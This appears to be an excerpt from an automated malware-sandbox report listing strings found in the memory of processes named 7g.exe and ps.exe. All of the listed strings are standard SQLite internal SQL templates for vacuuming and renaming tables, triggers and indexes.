Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence'; |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q); |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger'); |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0 |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s; |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s; |
Source: 7g.exe, 0000000D.00000003.681965409.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000D.00000003.681306883.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, ps.exe.13.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' |